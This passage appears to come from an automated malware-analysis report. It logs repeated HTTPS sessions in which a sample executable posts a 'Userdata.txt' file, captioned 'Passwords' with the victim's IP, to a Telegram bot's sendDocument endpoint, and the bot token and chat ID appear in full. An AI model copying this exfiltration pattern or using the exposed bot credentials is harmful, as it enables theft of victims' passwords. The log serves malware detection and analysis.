2025-01-11 06:24:27 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43774,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576667,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49969	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:28 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32db4edd8fcd Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:28 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 62 34 65 64 64 38 66 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32db4edd8fcdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:29 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:29 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:29 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43775,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576669,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49981	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:30 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32ef841d8f04 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:30 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 66 38 34 31 64 38 66 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32ef841d8f04Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:30 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:30 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43776,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576670,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49993	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:32 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33025319aa33 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:32 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 32 35 33 31 39 61 61 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33025319aa33Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:32 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:32 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43777,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576672,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50005	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:33 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33166bdcba3f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:33 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 36 36 62 64 63 62 61 33 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33166bdcba3fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:33 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:34 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43778,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576673,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50017	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:35 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd332920706cf4 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:35 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 39 32 30 37 30 36 63 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd332920706cf4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:35 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:35 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43779,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576675,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50029	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:36 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd333d1c059f2a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:36 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 64 31 63 30 35 39 66 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd333d1c059f2aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:37 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:37 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43780,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576677,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50041	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:38 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd334e617abdef Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:38 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 34 65 36 31 37 61 62 64 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd334e617abdefContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:38 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:38 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43781,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576678,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50046	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:40 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3360eddb09a8 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
